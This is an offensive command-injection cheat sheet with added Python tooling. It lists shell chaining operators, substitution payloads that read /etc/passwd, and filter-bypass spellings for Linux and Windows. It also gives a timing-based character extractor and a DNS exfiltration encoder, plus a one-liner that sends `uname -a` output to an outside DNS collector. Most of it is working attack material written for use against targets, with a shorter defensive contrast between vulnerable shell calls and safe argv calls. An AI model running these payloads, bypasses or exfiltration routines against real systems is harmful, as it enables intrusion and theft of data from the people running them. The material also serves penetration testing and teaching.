Command Injection
At a Glance
Command injection is an attack in which the attacker executes arbitrary commands on the host OS via a vulnerable application. It becomes possible when an application passes unsafe user-supplied data (form fields, cookies, HTTP headers, file names) to a system shell instead of invoking the program directly. [1]
Note: The injected commands run with the privileges of the vulnerable application, so the impact depends on the account the application runs as.
Command Chaining
<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls
Note: Also try:
- Prepending a flag or parameter.
- Removing spaces (`<input>;ls`).
Chaining Operators
Supported on Windows and Unix, with one caveat: `;` and the newline separate commands in Unix shells and PowerShell, but not in cmd.exe.
Syntax | Example | Description
---|---|---
%0A | cmd1 %0A cmd2 | URL-encoded newline. Executes both.
; | cmd1 ; cmd2 | Semicolon operator. Executes both.
& | cmd1 & cmd2 | Runs cmd1 in the background (Unix) or sequentially (cmd.exe). Executes both.
\| | cmd1 \| cmd2 | Pipe. Executes both; stdout of cmd1 becomes stdin of cmd2.
&& | cmd1 && cmd2 | AND operator. Executes cmd2 only if cmd1 succeeds.
\|\| | cmd1 \|\| cmd2 | OR operator. Executes cmd2 only if cmd1 fails.
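The following is an added example, not code from the original page: it checks each operator in the table against a succeeding and a failing first command under `/bin/sh` (which is what Python's `subprocess` with `shell=True` runs) and reports which operators actually let an injected `echo MARKER` execute. `MARKER`, `probe_operators` and `usable_operators` are the example's own names. The practical point it shows is the difference between `&&` and `||`: when the command you inject into fails (an unresolvable host passed to `ping`, a missing file), `&&` never reaches the payload and `||` always does.

```python
import subprocess

# Operators from the table; "\n" is what %0A becomes after URL decoding.
OPERATORS = ["\n", ";", "&", "|", "&&", "||"]


def run_sh(command: str) -> str:
    """Run a command string through /bin/sh -c (what shell=True does) and
    return its stdout."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def probe_operators(first_command: str) -> dict:
    """Append '<op> echo MARKER' to first_command for every operator and
    report, per operator, whether the injected echo actually ran."""
    report = {}
    for op in OPERATORS:
        injected = f"{first_command}{op} echo MARKER"
        report[op] = "MARKER" in run_sh(injected)
    return report


def usable_operators(first_command: str) -> list:
    """Operators through which an injected command would execute after
    first_command."""
    return [op for op, ran in probe_operators(first_command).items() if ran]


if __name__ == "__main__":
    # 'true' stands in for a target command that succeeds, 'false' for one
    # that fails (e.g. ping against a hostname that does not resolve).
    for cmd in ("true", "false"):
        print(cmd, "->", [repr(op) for op in usable_operators(cmd)])
```

Run it once with `true` and once with `false`: only `||` is missing from the first list and only `&&` from the second, so `;` or `|` is the safest first guess when you do not know whether the target command succeeds.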
I/O Redirection
> /var/www/html/output.txt   # append to the injected command to write its output into a web-served file, then fetch it over HTTP
< /etc/passwd                # feed a file to the command on stdin (also reads a file without typing a space)
Command Substitution
The shell runs the command inside backticks or `$( )` first and replaces the expression with that command's output. Substitution also happens inside double quotes (only single quotes suppress it), so the inner command executes even when the application has quoted the input. [2]
<input> `cat /etc/passwd`
<input> $(cat /etc/passwd)
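As an added example (not code from the page or from OWASP), here is a small Python feature that counts the lines of a user-named file in three ways: concatenating the input into a shell string, double-quoting it, and passing it as one argv element with no shell. It serves both the definition in At a Glance and the substitution payloads above: the quoted variant defeats `; touch ...` but not `$(touch ...)`, and only the argv form is safe. `count_lines_unquoted`, `count_lines_quoted`, `count_lines_safe`, `injection_succeeds` and the marker-file trick are the example's own constructs.

```python
import os
import re
import subprocess
import tempfile


def count_lines_unquoted(path: str) -> str:
    """Vulnerable: the user-controlled path is concatenated into a shell
    command string, so any chaining operator ends the wc command."""
    r = subprocess.run(f"wc -l {path}", shell=True, capture_output=True, text=True)
    return r.stdout + r.stderr


def count_lines_quoted(path: str) -> str:
    """Still vulnerable: double quotes stop ; | && || from being parsed as
    operators, but $(...) and backticks expand inside double quotes."""
    r = subprocess.run(f'wc -l "{path}"', shell=True, capture_output=True, text=True)
    return r.stdout + r.stderr


SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]+")


def count_lines_safe(path: str) -> str:
    """Hardened: allow-list the input, then hand it to wc as a single argv
    element. No shell is involved, so metacharacters are inert; '--' keeps
    a path starting with '-' from being parsed as an option."""
    if not SAFE_PATH.fullmatch(path) or ".." in path:
        raise ValueError("rejected path")
    r = subprocess.run(["wc", "-l", "--", path], capture_output=True, text=True)
    return r.stdout + r.stderr


def injection_succeeds(target, payload_for) -> bool:
    """Call target() with a payload that creates a marker file only if the
    shell executes the injected code, and report whether it appeared."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")
        try:
            target(payload_for(marker))
        except ValueError:
            return False
        return os.path.exists(marker)


if __name__ == "__main__":
    chain = lambda m: f"/dev/null; touch {m}"   # needs an unquoted context
    subst = lambda m: f"/dev/null$(touch {m})"  # also works inside double quotes
    for name, fn in [("unquoted", count_lines_unquoted),
                     ("quoted", count_lines_quoted),
                     ("argv", count_lines_safe)]:
        print(f"{name:9s} chaining={injection_succeeds(fn, chain)} "
              f"substitution={injection_succeeds(fn, subst)}")
```

Note that the quoted variant still returns a normal-looking `0 /dev/null` for the substitution payload, because `$(touch ...)` expands to nothing: the application sees no error while the injected command has already run.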
Filter Bypassing
Space filtering [3]
Linux
cat</etc/passwd
# bash
{cat,/etc/passwd}   # brace expansion produces "cat /etc/passwd"
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`
Windows [4]
The substring expansion `%VAR:~start,-end%` extracts the space from an environment variable whose value contains one (`%CommonProgramFiles%` is `C:\Program Files\Common Files`, `%PROGRAMFILES%` is `C:\Program Files`):
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
Slash (/) filtering
echo ${HOME:0:1} # / (bash substring expansion; $HOME is /root or /home/<user>)
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1' # / (tr shifts every character in the range !..0 up by one, so . becomes /)
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
Command filtering
Quotes (the shell removes them before execution, so the command name never appears literally in the input):
w'h'o'am'i
w"h"o"am"i
Backslash (escaping a character that needs no escaping just drops the backslash; repeated slashes in a path collapse):
w\ho\am\i
/\b\i\n/////s\h
At symbol (`$@` expands to nothing when there are no positional parameters):
who$@ami
Variable expansion (pattern substitution strips the padding):
v=/e00tc/pa00sswd
cat ${v//00/}
Wildcards (Windows; the globs resolve to C:\Windows\System32\notepad.exe and calc.exe, and `^` is the cmd.exe escape character):
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
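Added example, not code from the page: a naive blocklist filter for each of the three bypass categories above (space, slash, command name), run against the page's payloads under `/bin/sh` to confirm that each one both slips past its filter and produces the same output as the unfiltered command. Only the POSIX-sh payloads are included; the brace-expansion, `$'...'`, `${HOME:0:1}` and `${v//00/}` variants require bash. `FILTERS`, `CASES` and `bypass_report` are the example's own names.

```python
import subprocess


def run_sh(command: str) -> str:
    """Run a command string through /bin/sh -c and return its stdout."""
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


# Naive blocklist filters, one per bypass category on the page.
FILTERS = {
    "space": lambda s: " " not in s,
    "slash": lambda s: "/" not in s,
    "name": lambda s: "whoami" not in s,
}

# (filter the payload must pass, bypass payload, unfiltered command it should equal)
CASES = [
    ("space", "cat</etc/passwd", "cat /etc/passwd"),
    ("space", "cat${IFS}/etc/passwd", "cat /etc/passwd"),
    ("slash", """cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd""",
     "cat /etc/passwd"),
    ("name", "w'h'o'am'i", "whoami"),
    ("name", "w\\ho\\am\\i", "whoami"),   # w\ho\am\i once Python escaping is removed
    ("name", "who$@ami", "whoami"),
]


def bypass_report() -> list:
    """For every case, record whether the payload slips past its filter and
    whether it still executes with the intended effect (same stdout as the
    plain command)."""
    report = []
    for filter_name, payload, reference in CASES:
        report.append({
            "filter": filter_name,
            "payload": payload,
            "passes_filter": FILTERS[filter_name](payload),
            "works": run_sh(payload) == run_sh(reference),
        })
    return report


if __name__ == "__main__":
    for row in bypass_report():
        print(f"[{row['filter']:5s}] passes_filter={row['passes_filter']} "
              f"works={row['works']}  {row['payload']}")
```

Every row comes back `passes_filter=True works=True`, which is the argument against character or keyword blocklists: the shell offers too many equivalent spellings for a denylist to enumerate, so the fix is to stop invoking a shell, not to filter harder.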
Time Based Data Exfiltration [5]
When the command's output is not returned to you, infer it from response time: the injected condition sleeps only when the guessed character matches, so the output is recovered one character per series of guesses. (`==` inside `[ ]` is bash; use `=` when the target shell is plain POSIX sh.)
time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi
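Added example, not code from the page or from the Security Café post: the same conditional-sleep primitive turned into a character-by-character extractor in Python, using the POSIX `=` comparison so it also runs under `/bin/sh`. `timed_probe`, `extract_by_timing` and the one-second delay are the example's own choices; against a real target the payload would be sent in the HTTP request that reaches the vulnerable shell call, with a delay long enough to beat network jitter.

```python
import subprocess
import time


def timed_probe(command: str, position: int, guess: str, delay: float) -> bool:
    """Inject a conditional sleep: the shell sleeps only when character
    `position` (1-based) of `command`'s output equals `guess`. The caller
    learns the answer from elapsed time alone, never from output."""
    payload = (f'if [ "$({command} | cut -c{position})" = "{guess}" ]; '
               f"then sleep {delay}; fi")
    start = time.monotonic()
    subprocess.run(payload, shell=True, capture_output=True)
    return time.monotonic() - start >= delay / 2


def extract_by_timing(command: str, length: int, alphabet: str,
                      delay: float = 1.0) -> str:
    """Recover up to `length` characters of `command`'s first output line by
    trying each alphabet character per position. Stops early when no
    candidate matches (end of output, or a character outside `alphabet`).
    Keep characters the shell treats specially (double quote, dollar,
    backtick, backslash) out of `alphabet`; they would break the payload."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if timed_probe(command, pos, ch, delay):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    # 'echo Linux' stands in for 'uname -a'; a small alphabet keeps the demo
    # to a few seconds (cost is one sleep per hit plus one probe per miss).
    print(extract_by_timing("echo Linux", 5, "Lixnu"))
```

Cost grows as positions multiplied by alphabet size, each hit costing a full sleep, so in practice you narrow the alphabet (for example `[ "$(... | cut -c1)" \< "m" ]` style comparisons, or probing `cut -c1 | od -An -tu1` for numeric ranges) before brute-forcing single characters.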
DNS Based Data Exfiltration [6]
Make the target resolve a hostname that embeds the data, and read it back from the query log of a DNS collector such as dnsbin. Example:
host $(uname -a).c2cebb6a3678849a2eee.d.zhack.ca
Caveat: command output that contains spaces, slashes or other characters not allowed in hostnames is split by the shell into several `host` arguments and rejected by the resolver; labels are also limited to 63 characters. Encode the output (hex or base64) and split it into labels before using it this way.
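Added example, not code from the page or from dnsbin: the encoding step the `host $(uname -a)...` one-liner skips. Hostnames allow only letters, digits and hyphens, a label is at most 63 characters and a full name at most 253, so the sender hex-encodes the data, chunks it into labels and prefixes each query with a sequence number; the receiver, working from the raw query names in the collector's log, reorders and decodes them. `d.example` is a placeholder collector domain, the sample `uname -a` line is constructed, and all function names are the example's own.

```python
MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a full hostname


def dns_exfil_queries(data: bytes, domain: str, label_len: int = 60,
                      labels_per_query: int = 3) -> list:
    """Hex-encode `data` and split it into hostnames of the form
    <seq>.<hex>.<hex>.<hex>.<domain>. Hex keeps every label within the
    hostname character set; the sequence label lets the receiver reorder
    queries that arrive out of order (resolvers retry and parallelise)."""
    assert label_len <= MAX_LABEL
    hexdata = data.hex()
    per_query = label_len * labels_per_query
    queries = []
    for seq, start in enumerate(range(0, len(hexdata), per_query)):
        piece = hexdata[start:start + per_query]
        labels = [piece[i:i + label_len] for i in range(0, len(piece), label_len)]
        name = ".".join([str(seq)] + labels + [domain])
        assert len(name) <= MAX_NAME, "domain too long for this chunking"
        queries.append(name)
    return queries


def dns_exfil_reassemble(queries: list, domain: str) -> bytes:
    """Receiver side: strip the collector domain, order by sequence number
    and decode the hex. Works on the query names a DNS log records."""
    suffix = "." + domain
    parts = {}
    for name in queries:
        body = name[:-len(suffix)] if name.endswith(suffix) else name
        seq, _, hexpart = body.partition(".")
        parts[int(seq)] = hexpart.replace(".", "")
    return bytes.fromhex("".join(parts[k] for k in sorted(parts)))


# Constructed sample of what `uname -a` might print on a target.
SAMPLE = b"Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux"

if __name__ == "__main__":
    names = dns_exfil_queries(SAMPLE, "d.example")
    for q in names:
        print(q)
    print(dns_exfil_reassemble(names, "d.example"))
```

On the target itself the sender side of a single query can be built in the shell with `uname -a | od -An -tx1 | tr -d ' \n' | fold -w 60 | paste -sd .` (hex bytes, whitespace stripped, wrapped into 60-character labels, joined with dots), which covers up to three labels of output; longer output needs the loop the Python version performs.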
“Command Injection | OWASP.” OWASP Foundation, https://owasp.org/www-community/attacks/Command_Injection.
“Command Injection | OWASP.” OWASP Foundation, https://owasp.org/www-community/attacks/Command_Injection.
bugbountynights. Twitter, https://twitter.com/bugbountynights/status/860102244171227136.
Pobereznicenco, Dan. “Exploiting Timed Based RCE.” Security Café, 28 Feb. 2017, https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/.
ettic-team. “dnsbin: The Request.Bin of DNS Requests.” GitHub, https://github.com/ettic-team/dnsbin.